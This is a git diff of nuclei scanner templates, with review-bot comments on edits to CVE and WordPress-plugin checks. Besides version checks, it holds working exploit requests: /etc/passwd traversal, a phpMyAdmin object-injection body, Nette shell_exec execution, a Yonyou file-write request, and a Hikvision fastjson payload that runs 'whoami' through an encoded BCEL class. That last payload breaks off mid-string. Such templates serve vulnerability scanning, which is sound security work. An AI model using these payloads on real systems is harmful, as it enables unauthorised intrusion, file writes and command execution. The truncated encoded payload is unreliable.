diff --git a/poc/cve/cve-2001-1473.yaml b/poc/cve/cve-2001-1473.yaml index 80480efb7b..d7ad14a2d1 100644 --- a/poc/cve/cve-2001-1473.yaml +++ b/poc/cve/cve-2001-1473.yaml @@ -1,11 +1,11 @@ id: CVE-2001-1473 - info: name: Deprecated SSHv1 Protocol Detection author: iamthefrogy severity: high - + tags: cve,cve2001,network,ssh,openssh description: SSHv1 is deprecated and has known cryptographic issues. + remediation: Upgrade to SSH 2.4 or later. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 @@ -14,13 +14,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cve-id: CVE-2001-1473 cwe-id: CWE-310 - network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: word words: - "SSH-1" + +# Updated by Chris on 2022/01/21 diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml index fda684a006..e714f96cca 100644 --- a/poc/cve/cve-2008-5587.yaml +++ b/poc/cve/cve-2008-5587.yaml 
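Review bot: The added `remediation: Upgrade to SSH 2.4 or later.` conflates the protocol with a software release: the finding is that protocol version 1 is offered, and the fix is to stop serving SSH-1 and accept only SSH-2, not to reach a particular version number. Suggest `remediation: Disable the SSH-1 protocol on the server and allow only SSH-2.` The `SSH-1` word matcher will also fire on `SSH-1.99` banners, which is the intended behaviour since such servers still accept protocol 1, but the description could say so to save triage time. The hunk's context lines are collapsed here, so the exact indentation of the new `tags` and `remediation` keys under `info` could not be verified.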
@@ -1,28 +1,27 @@ id: CVE-2008-5587 + info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/7363 - - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ - - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 - - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 - classification: - cve-id: CVE-2008-5587 + reference: https://www.exploit-db.com/exploits/7363 + metadata: - shodan-query: http.title:"phpPgAdmin" - tags: cve,cve2008,lfi,phppgadmin + shodan-query: 'http.title:"phpPgAdmin"' + description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." + requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 diff --git a/poc/cve/cve-2009-1151.yaml b/poc/cve/cve-2009-1151.yaml index 3984eacf94..cc013e8a10 100644 --- a/poc/cve/cve-2009-1151.yaml +++ b/poc/cve/cve-2009-1151.yaml 
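Review bot: The new side removes `tags: cve,cve2008,lfi,phppgadmin` and the entire `classification` block with `cve-id: CVE-2008-5587`, and collapses four references to a single `reference: https://www.exploit-db.com/exploits/7363` line; without `tags` the template can no longer be selected with `-tags cve` or excluded by tag, and without `cve-id` it cannot be correlated with the CVE it is named after. The `description` now appears after `metadata:` in the hunk and its indentation is not recoverable from the collapsed text, so it may have landed inside `metadata` rather than under `info`. At minimum the `tags:` and `classification:` lines should be restored; the templates added elsewhere in this commit also use `http:` where this file keeps the legacy `requests:` key.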
@@ -1,15 +1,21 @@ id: CVE-2009-1151 - info: - name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability + name: PhpMyAdmin Scripts - Remote Code Execution author: princechaddha - severity: high - description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + severity: critical + description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 - - + - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301 + - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php + - https://nvd.nist.gov/vuln/detail/CVE-2009-1151 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2009-1151 + cwe-id: CWE-77 + tags: cve,cve2009,phpmyadmin,rce,deserialization,kev requests: - raw: - | @@ -20,13 +26,13 @@ requests: Content-Type: application/x-www-form-urlencoded action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} - matchers-condition: and matchers: - type: status status: - 200 - - type: regex regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/07/06 diff --git a/poc/cve/cve-2018-15473.yaml b/poc/cve/cve-2018-15473.yaml index e2eabe600d..2392e8714b 100644 --- a/poc/cve/cve-2018-15473.yaml +++ b/poc/cve/cve-2018-15473.yaml 
@@ -1,28 +1,28 @@ id: CVE-2018-15473 - info: name: OpenSSH Username Enumeration <= v7.7 author: r3dg33k,daffainfo,forgedhallpass severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 + - https://bugs.debian.org/906236 + - http://www.openwall.com/lists/oss-security/2018/08/15/5 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-15473 cwe-id: CWE-362 - - + tags: network,openssh,cve,cve2018 network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' - extractors: - type: regex regex: diff --git a/poc/cve/cve-2018-15535.yaml b/poc/cve/cve-2018-15535.yaml index a4fa48f002..ed7aa501ed 100644 --- a/poc/cve/cve-2018-15535.yaml +++ b/poc/cve/cve-2018-15535.yaml 
@@ -1,32 +1,31 @@ id: CVE-2018-15535 - info: - name: Responsive FileManager < 9.13.4 - Directory Traversal + name: Responsive FileManager <9.13.4 - Local File Inclusion author: daffainfo severity: high - description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. + description: Responsive FileManager before version 9.13.4 is susceptible to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory. Instead, because it does not properly neutralize get_file sequences such as ".." can resolve to a location that is outside of that directory, aka local file inclusion. reference: - https://www.exploit-db.com/exploits/45271 - - https://www.cvedetails.com/cve/CVE-2018-15535 - + - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 + - http://seclists.org/fulldisclosure/2018/Aug/34 + - https://www.exploit-db.com/exploits/45271/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 - + tags: cve,cve2018,lfi requests: - method: GET path: - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/07/07 diff --git a/poc/cve/cve-2020-15227.yaml b/poc/cve/cve-2020-15227.yaml index 2adba03624..9a75579bdb 100644 --- a/poc/cve/cve-2020-15227.yaml +++ b/poc/cve/cve-2020-15227.yaml 
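Review bot: The added reference `- https://www.exploit-db.com/exploits/45271/` duplicates the existing `- https://www.exploit-db.com/exploits/45271` two entries above (they differ only by the trailing slash); drop one. The rewritten description also has a broken clause, `because it does not properly neutralize get_file sequences such as ".." can resolve to a location`, which reads correctly as `because it does not properly neutralize sequences such as ".." in the get_file parameter, the path can resolve to a location`. The tightened matcher `root:.*:0:0:` is fine and matches the form used in the other hunks of this commit.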
@@ -1,28 +1,34 @@ id: CVE-2020-15227 info: - name: nette Framework RCE - author: hackergautam - severity: high - reference: unknown - tags: cve,cve2020,nette,rce + name: Nette Framework RCE + author: becivells + severity: critical + description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 + - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 + - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# + - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15227 + cwe-id: CWE-74 requests: - method: GET path: - - "{{BaseURL}}/index.php/nette.micro/?callback=shell_exec&cmd=id&what=-1" + - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1" matchers-condition: and matchers: - - type: word - words: - - "uid" - - "gid" - part: body - condition: and + - type: regex + regex: + - "root:.*:0:0:" - type: status status: - 200 - diff --git a/poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml b/poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml new file mode 100644 index 0000000000..75e6da1f6e --- /dev/null +++ b/poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml 
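Review bot: `cvss-score: 9.80` uses the two-decimal form that this same commit normalizes away in cve-2018-15473.yaml (`5.30` to `5.3`) and cve-2018-15535.yaml (`7.50` to `7.5`); use `cvss-score: 9.8` for consistency. The new description has grammar errors (`an code injection attack`, `may possibly leading to RCE`); suggest `a code injection attack by passing specially formed parameters in the URL that may lead to remote code execution`. The new path still drives `shell_exec` on the target, now to read a file instead of running `id`, so this remains a command-executing check rather than a fingerprint; tagging it `intrusive` lets operators exclude it with `-exclude-tags intrusive`, and the matcher on `root:.*:0:0:` only confirms Unix-like hosts, which the description should mention.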
@@ -0,0 +1,59 @@
+id: favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5
+
+info:
+ name: >
+ Favicon Generator <= 1.5 - Cross-Site Request Forgery to Arbitrary File Deletion
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6eb3ad80-3510-4018-91af-b733ef62e28f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/favicon-generator/"
+ google-query: inurl:"/wp-content/plugins/favicon-generator/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,favicon-generator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/favicon-generator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "favicon-generator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5')
\ No newline at end of file
diff --git a/poc/header/header-footer-code-08ebf57284e81768e19b2643c32c71af.yaml b/poc/header/header-footer-code-08ebf57284e81768e19b2643c32c71af.yaml
new file mode 100644
index 0000000000..f29a9f0c99
--- /dev/null
+++ b/poc/header/header-footer-code-08ebf57284e81768e19b2643c32c71af.yaml
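Review bot: The new template leaves `description: >`, `cvss-metrics:`, `cvss-score:` and `cve-id:` empty while tagging the finding `cve`, so anyone filtering on the tag or the classification block gets nothing to act on, and `shodan-query: 'vuln:'` is an unfilled placeholder; the same applies to the header-footer-code (both), bitformpro, compute-links, custom-permalinks, devvn-image-hotspot, display-a-meta-field-as-block, givingpress-lite, gutentor, hr-management, imagerecycle-pdf-image-compression (both) and kbucket templates added in this commit. The check itself only reads the `Stable tag` from `readme.txt` (`Version:` from `style.css` for the theme), so a site that blocks readme access, or a patched site whose readme was not updated, is misreported either way; the description should say so, e.g. `description: > Version-based check: flags the plugin when readme.txt reports Stable tag <= 1.5. No vulnerable behavior is exercised.` The `version` extractor is also declared twice, once `internal: true` and once exported, which is presumably deliberate for output but deserves a comment.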
@@ -0,0 +1,59 @@
+id: header-footer-code-08ebf57284e81768e19b2643c32c71af
+
+info:
+ name: >
+ NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3256da87-0d37-4c8f-9bac-95e3017e35d5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/header-footer-code/"
+ google-query: inurl:"/wp-content/plugins/header-footer-code/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,header-footer-code,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "header-footer-code"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/header/header-footer-code-afbd01983360416a12cb28f807e89a8d.yaml b/poc/header/header-footer-code-afbd01983360416a12cb28f807e89a8d.yaml
new file mode 100644
index 0000000000..70794beba5
--- /dev/null
+++ b/poc/header/header-footer-code-afbd01983360416a12cb28f807e89a8d.yaml
@@ -0,0 +1,59 @@
+id: header-footer-code-afbd01983360416a12cb28f807e89a8d
+
+info:
+ name: >
+ NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting via CSS Styles
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/521af15c-983c-49dc-a90b-b090281db78a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/header-footer-code/"
+ google-query: inurl:"/wp-content/plugins/header-footer-code/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,header-footer-code,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "header-footer-code"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml
index 653783158e..cef49f23fa 100644
--- a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml
+++ b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml
@@ -1,43 +1,36 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: Yonyou NC Cloud - Remote Code Execution - author: Co5mos + name: yonyou-nc-cloud-jsinvoke-rce + author: pphua severity: critical - description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. - reference: - - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q + tags: yonyou,nc-cloud,rce + reference: + - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" - tags: yonyou,rce - -variables: - str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} + - | - GET /{{str1}} HTTP/1.1 - Host: {{Hostname}} + GET /{{randstr}}.txt HTTP/1.1 + Content-Length: 138 + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - matchers-condition: and matchers: - type: word - part: body words: - - '5d8be7535d6383e99315739724e10fa7' - - - type: status - status: - - 200 \ No newline at end of file + - "StringObject" + part: body \ No newline at end of file 
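Review bot: The second raw request now sends `Content-Length: 138` on a GET with no body, which a server may treat as a pending body and hold until timeout; remove that header. The rewrite also replaces the unique `md5(...)` marker with the generic literal `StringObject` as both the written content and the matched word, drops the `status` matcher, and drops the `str1` variable in favour of `{{randstr}}` in two separate requests — if `randstr` is not stable across raw requests the GET fetches a different file, which the explicit variable avoided. `name:` has become a copy of the id and the `description` is gone; restore a human-readable name and a description that states the side effect, e.g. `description: Writes a .txt file under webapps/nc_web/ on the target to confirm the issue; the file is not removed afterwards.`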
diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml 
@@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
